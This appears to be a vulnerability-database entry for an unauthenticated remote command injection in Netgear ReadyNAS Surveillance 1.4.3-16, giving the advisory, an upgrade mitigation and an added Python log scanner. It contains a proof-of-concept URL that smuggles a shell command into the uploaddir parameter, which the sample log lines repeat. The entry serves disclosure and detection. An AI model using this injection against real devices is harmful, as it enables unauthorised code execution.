Vendor: ReadyNAS Surveillance
By: Kacper Szurek
CVSS: 9.8 HIGH
Title: Unauthenticated Remote Code Execution
CWE: 78
Product Name: ReadyNAS Surveillance
Affected Version From: 1.4.3-16
Affected Version To: 1.4.3-16
Patch Exists: YES
Related CWE: N/A
CPE: a:netgear:readynas_surveillance:1.4.3-16
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE

$_GET['uploaddir'] is not escaped and is passed to system() through $tmp_upload_dir, so an unauthenticated request can inject shell commands.

Mitigation:

Upgrade to version 1.4.3-17 or later.

Exploit-DB raw data:

# Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE
# Date: 27.09.2017
# Software Link: https://www.netgear.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
   
1. Description
  
$_GET['uploaddir'] is not escaped and passed to system() through $tmp_upload_dir.

https://security.szurek.pl/netgear-ready-nas-surveillance-14316-unauthenticated-rce.html
 
2. Proof of Concept

http://IP/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;sleep%205;%27
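
Detection example (added here, not part of the original advisory or of Netgear's code): a log check that flags requests to upgrade_handle.php with cmd=writeuploaddir whose decoded uploaddir value is not a plain path. It assumes a combined-format web access log and that legitimate uploaddir values contain only letters, digits, and the characters _ . / -; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate uploaddir is a plain path and nothing else.
SAFE_PATH = re.compile(r"[A-Za-z0-9_./-]*")

def query_params(query):
    """Split on '&' only, so an unencoded ';' stays inside the value."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def suspicious_uploaddir(log_line):
    """Return the decoded uploaddir value if it is not a plain path, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/upgrade_handle.php"):
        return None
    params = query_params(url.query)
    if "writeuploaddir" not in params.get("cmd", []):
        return None
    for value in params.get("uploaddir", []):
        if not SAFE_PATH.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_uploaddir(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Sep/2017:10:00:01 +0000] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;sleep%205;%27 HTTP/1.1" 200 12',
    '192.0.2.10 - - [27/Sep/2017:10:00:05 +0000] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=/tmp/upload HTTP/1.1" 200 12',
    '192.0.2.10 - - [27/Sep/2017:10:00:09 +0000] "GET /index.php?uploaddir=%27 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious uploaddir {value!r}")
```

Because the endpoint is reachable without authentication, any hit on a device still running 1.4.3-16 should be treated as a possible compromise and not only as a probe.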